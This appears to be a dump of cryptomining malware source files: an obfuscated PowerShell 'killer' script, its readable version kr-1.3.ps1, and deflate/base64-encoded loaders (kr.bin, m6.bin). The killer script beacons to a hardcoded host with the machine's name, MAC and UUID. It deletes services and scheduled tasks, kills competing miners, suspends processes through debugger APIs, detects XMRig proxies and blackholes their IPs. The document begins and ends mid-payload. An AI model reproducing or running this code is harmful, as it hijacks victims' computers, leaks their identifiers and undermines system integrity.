-ne 0){ ProcessSuspend JRtcurrpid ban'+'Ip JRtip '+' JRtglobal:ipdealcache += JRtline[2] sendmsg JRtline[2] JRtismproxy JRtcurrpid } } if(JRtipcache -notcontains JRtline['+'2]){JRti'+'pcache += JRtline[2]} } } JRtglobal:re'+'try++ } JRtstart_time=Get-Date -UFormat uWy%suWy JRtglobal:ipdealcache=@() JRtglobal:retry=0 JRtser=[System.Net.Soc'+'ke'+'ts.TcpListener]65529 JRtser.start()'+' while('+'JRttrue){ if(((Get-Date -UFormat uWy%suWy)-JRtstart_time) -gt 60000) {break} uWytry to kill...uWy K'+'iller uWykill '+'done...uWy Start-Sleep -S'+'econds 600 } ').rePlAcE(([chAR]74+[chAR]82+[chAR]116),[STrinG][chAR]36).rePlAcE(([chAR]105+[chAR]68+[chAR]102),[STrinG][chAR]39).rePlAcE('TaD',[STrinG][chAR]92).rePlAcE('eS1','|').rePlAcE('uWy',[STrinG][chAR]34).rePlAcE('9mR','')) -------------------------------------------------------------------------------- 
/DriveLife/krBin/kr-1.3.ps1: -------------------------------------------------------------------------------- 1 | if(!$down_url){ $down_url = 'http://d.u78wjdu.com' } try{$version=$ifmd5[0..5]-join""}catch{} function isPubIP { Param( [parameter(Mandatory=$true)][String]$ip ) $resIps = @( @(4026531840L, 3758096384L), @(4026531840L, 4026531840L), @(4278190080L, 0L), @(4278190080L, 167772160L), @(4278190080L, 2130706432L), @(4290772992L, 1681915904L), @(4293918720L, 2886729728L), @(4294836224L, 3323068416L), @(4294901760L, 2851995648L), @(4294901760L, 3232235520L), @(4294967040L, 3221225472L), @(4294967040L, 3221225984L), @(4294967040L, 3227017984L), @(4294967040L, 3325256704L), @(4294967040L, 3405803776L), @(4294967295L, 4294967295L) ) $iparr = $ip.split(".") $iplong = 0 for($i=3;$i -ge 0; $i--){ $iplong = $iplong -bor [int]$iparr[3-$i] * [math]::pow(2,8*$i) } for($j=0;$j -lt $resIps.count;$j++){ if(($iplong -band $resIps[$j][0]) -eq $resIps[$j][1]){ return $false } } return $true } function ssl_connect($ip,$port,$send_str){ $ret = "" try{ $socket = New-Object Net.Sockets.TcpClient($ip, $port) $sslStream = New-Object System.Net.Security.SslStream($socket.GetStream(),$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])) $sslStream.ReadTimeout = 5000 $sslStream.AuthenticateAsClient('') $writer = new-object System.IO.StreamWriter($sslStream) $reader = new-object System.IO.StreamReader($sslStream) $writer.WriteLine($send_str) $writer.flush() $ret = $reader.ReadLine() $socket.close() }catch{} return $ret } function raw_connect($ip,$port,$send_str){ try{ $client = NEW-objEcT Net.Sockets.TcpClient($ip,$port) $sock = $client.Client $bytes = [Text.Encoding]::ASCII.GetBytes($send_str) $sock.send(($bytes)) | out-null $sock.ReceiveTimeout = 5000 $res = [Array]::CreateInstance(('byte'), 10000) $recv = $sock.Receive($res) $res = $res[0..($recv-1)] $str = [Text.Encoding]::ASCII.getstring($res) return $str }catch{} return "" } function ishttp($ip,$port){ 
$data="GET / HTTP/1.1nn" $ret = raw_connect $ip $port $data if($ret.indexOf("HTTP/1") -ne -1){ return $true } return $false } function ishttps($ip,$port){ $data = "GET / HTTP/1.1nn" $ret = ssl_connect $ip $port $data if($ret.indexOf("HTTP/1") -ne -1){ return $true } return $false } function isminerproxy($ip,$port){ $data ='{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":null,"agent":"XMRig/5.13.1","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva"]}}' + "n" $ret = raw_connect $ip $port $data if($ret.indexOf("jsonrpc") -ne -1){ write-host "miner proxy!!" return $true } return $false } function isminerproxys($ip,$port){ $data = '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":null,"agent":"XMRig/5.13.1","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx","rx/keva"]}}' $ret = ssl_connect $ip $port $data if($ret.indexOf("jsonrpc") -ne -1){ write-host "miner proxys!!" return $true } return $false } Add-Type -TypeDefinition 'using System;using System.Diagnostics;using System.Security.Principal;using System.Runtime.InteropServices;public static class Kernel32{[DllImport("kernel32.dll")] public static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess,out bool pbDebuggerPresent);[DllImport("kernel32.dll")] public static extern int DebugActiveProcess(int PID);[DllImport("kernel32.dll")] public static extern int DebugActiveProcessStop(int PID);}' function ProcessSuspend($id){ $procName = (Get-Process -id $id -ErrorAction SilentlyContinue).name if($procName -eq $null){ Write-Host "ERROR: There is no process with an ID of $id" return } Write-host "Attempting to suspend $procName (PID: $id)..." 
if ($id -le 0) { write-host "You didn't input a positive integer" return } $debug = whoami /priv | Where-Object{$_ -like "*SeDebugPrivilege*"} if($debug -ne $null){ $DebugPresent = [IntPtr]::Zero $out = [Kernel32]::CheckRemoteDebuggerPresent(((Get-Process -Id $id).Handle),[ref]$debugPresent) if ($debugPresent){ write-host "There is already a debugger attached to this process" return } $suspend = [Kernel32]::DebugActiveProcess($id) if ($suspend -eq $false){ write-host "ERROR: Unable to suspend $procName (PID: $id)" } else{ write-host "The $procName process (PID: $id) was successfully suspended!" } } else{ write-host "ERROR: You do not have debugging privileges to pause any process" return } } function gmd5($d){ [Security.Cryptography.MD5]::Create().ComputeHash($d)|foreach{$l+=$_.ToString('x2')} return $l } function getprotected(){ function getrname(){ function gmd5($d){ [Security.Cryptography.MD5]::Create().ComputeHash($d)|foreach{$l+=$_.ToString('x2')} return $l } $rpath="C:\Windows\System32\Windowspowershell\V1.0" $enames = gci "$rpath\*" -Include *.exe -Exclude powershell.exe|foreach{$_.name} $tmd5 = gmd5 ([IO.File]::ReadAllBytes("$rpath\powershell.exe")) foreach($ename in $enames){ $md5_=gmd5 ([IO.File]::ReadAllBytes("$rpath\$ename")) if($tmd5 -eq $md5_){ return $ename } } return "NULLNULL" } $comp_name = $env:COMPUTERNAME $guid = (get-wmiobject Win32_ComputerSystemProduct).UUID $mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1 $m6exe=(gmd5 ([system.Text.Encoding]::UTF8.GetBytes($comp_name+$guid+$mac))).substring(0,6) $pids=@() $pids+=Get-WmiObject -Class Win32_Process|Where-Object{$_.path -like '*m6g.bin.exe*' -or $_.path -like '*m6.bin.exe*' -or $_.path -like "*$m6exe*" -or $_.name -eq (getrname)}|foreach{$_.processid} return $pids } function sendmsg($ip,$ismproxy,$mpid){ try{ $mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | 
select-object -first 1 $guid = (get-wmiobject Win32_ComputerSystemProduct).UUID $comp_name = $env:COMPUTERNAME if($ip -eq ''){ $url = "$down_url/kl_repo.json?$version&$global:retry&$comp_name&$mac&$guid" } else { $pname = Get-Process -id $mpid | Select-Object -ExpandProperty Name $url = "$down_url/rellik.json?$version&$global:retry&$comp_name&$mac&$guid&$ip&$ismproxy&$mpid&$pname" } (New-Object Net.WebClient).DownloadString($url) }catch{} } function banIp($ip){ route add $ip 0.0.0.0 IF 1 -p } function unbanIp($ip){ route delete $ip 0.0.0.0 } Function Killer { $SrvName = "xWinWpdSrv", "SVSHost", "Microsoft Telemetry", "lsass", "Microsoft", "system", "Oracleupdate", "CLR", "sysmgt", "\gm", "WmdnPnSN", "Sougoudl","National", "Nationaaal", "Natimmonal", "Nationaloll", "Nationalmll","Nationalaie","Nationalwpi","WinHelp32","WinHelp64", "Samserver", "RpcEptManger", "NetMsmqActiv Media NVIDIA", "Sncryption Media Playeq","SxS","WinSvc","mssecsvc2.1","mssecsvc2.0","Windows_Update","Windows Managers","SvcNlauser","WinVaultSvc","Xtfy","Xtfya","Xtfyxxx","360rTys","IPSECS","MpeSvc","SRDSL","WifiService","ALGM","wmiApSrvs","wmiApServs","taskmgr1","WebServers","ExpressVNService","WWW.DDOS.CN.COM","WinHelpSvcs","aspnet_staters","clr_optimization","AxInstSV","Zational","DNS Server","Serhiez","SuperProServer",".Net CLR","WissssssnHelp32","WinHasdadelp32","WinHasdelp32","ClipBooks" write-host "kill services..." 
foreach($Srv in $SrvName) { $Null = SC.exe Config $Srv Start= Disabled $Null = SC.exe Stop $Srv $Null = SC.exe Delete $Srv } $TaskName = "my1","Mysa", "Mysa1", "Mysa2", "Mysa3", "ok", "Oracle Java", "Oracle Java Update", "Microsoft Telemetry", "Spooler SubSystem Service","Oracle Products Reporter", "Update service for products", "gm", "ngm","Sorry","Windows_Update","Update_windows","WindowsUpdate1","WindowsUpdate2","WindowsUpdate3","AdobeFlashPlayer","FlashPlayer1","FlashPlayer2","FlashPlayer3","IIS","WindowsLogTasks","System Log Security Check","Update","Update1","Update2","Update3","Update4","DNS","SYSTEM","DNS2","SYSTEMa","skycmd","Miscfost","Netframework","Flash","RavTask","GooglePingConfigs","HomeGroupProvider","MiscfostNsi","WwANsvc","Bluetooths","Ddrivers","DnsScan","WebServers","Credentials","TablteInputout","werclpsyport","HispDemorn","LimeRAT-Admin","DnsCore","Update service for Windows Service","DnsCore","ECDnsCore" write-host "kill tasks..." foreach ($Task in $TaskName) { SchTasks.exe /Delete /TN $Task /F 2> $Null } $Miner = "SC","WerMgr","WerFault","DW20","msinfo", "XMR*","xmrig*", "minerd", "MinerGate", "Carbon", "yamm1", "upgeade", "auto-upgeade", "svshost", "SystemIIS", "SystemIISSec", 'WindowsUpdater*', "WindowsDefender*", "update", "carss", "service", "csrsc", "cara", "javaupd", "gxdrv", "lsmosee", "secuams", "SQLEXPRESS_X64_86", "Calligrap", "Sqlceqp", "Setting", "Uninsta", "conhoste","Setring","Galligrp","Imaging","taskegr","Terms.EXE","360","8866","9966","9696","9797","svchosti","SearchIndex","Avira","cohernece","win","SQLforwin","xig*","taskmgr1","Workstation","ress","explores" write-host "kill processes..." 
foreach ($m in $Miner) { Get-Process -Name $m -ErrorAction SilentlyContinue | Stop-Process -Force } $tm = Get-Process -Name TaskMgr -ErrorAction SilentlyContinue if($tm -eq $null){ Start-Process -WindowStyle hidden -FilePath Taskmgr.exe } $tcpconn = NetStat -anop TCP $ipcache=@('170.187.149.77:80','138.68.186.90:80','176.58.99.231:80','138.68.251.24:80','165.227.62.120:443','202.182.120.192:443','178.62.2.194:443','138.68.4.19:443','176.58.99.231:443','138.68.251.24:443','85.117.234.189:443','159.203.122.42') foreach($tempip in $ipcache){ unbanIp $tempip } $ppids = getprotected write-host "kill connections..." foreach ($t in $tcpconn) { $line = $t.split(' ')| ? {$_} if ($line -eq $null) { continue } if ($t.contains("LISTENING") -and ($line[1].contains("43669") -or $line[1].contains("43668"))) { $ppids += $line[-1] continue } if($t.contains("ESTABLISHED") -and ($line[2].gettype() -eq "".gettype()) -and ($line[2].indexOf(":") -ne -1)){ $ip,$port = $line[2].split(':') $currpid = $line[-1] if(($ipcache -contains $line[2]) -or ($ppids -contains $currpid) -or ($ip.length -lt 4) -or -not(isPubIP $ip) -or ($port -le 0)){ continue } if($global:ipdealcache -contains $line[2]){ ProcessSuspend $currpid banIp $ip continue } write-host "try $ip $port..." if(((ishttp $ip $port) -eq $false) -and ((ishttps $ip $port) -eq $false)){ write-host "end http test..." $ismproxy = 0 if((isminerproxy $ip $port) -eq $true){ $ismproxy = 1 } else{ if((isminerproxys $ip $port) -eq $true){ $ismproxy = 2 } } if($ismproxy -ne 0){ ProcessSuspend $currpid banIp $ip $global:ipdealcache += $line[2] sendmsg $line[2] $ismproxy $currpid } } if($ipcache -notcontains $line[2]){$ipcache += $line[2]} } } $global:retry++ } $start_time=Get-Date -UFormat "%s" $global:ipdealcache=@() $global:retry=0 $ser=[System.Net.Sockets.TcpListener]65529 $ser.start() while($true){ if(((Get-Date -UFormat "%s")-$start_time) -gt 60000) {break} "try to kill..." Killer "kill done..." 
Start-Sleep -Seconds 600 } 2 | -------------------------------------------------------------------------------- /DriveLife/krBin/kr.bin: -------------------------------------------------------------------------------- 1 | $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('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'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd(); 2 | -------------------------------------------------------------------------------- /DriveLife/m6Bin/m6.bin: -------------------------------------------------------------------------------- 1 | $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::"FromBase64String"('
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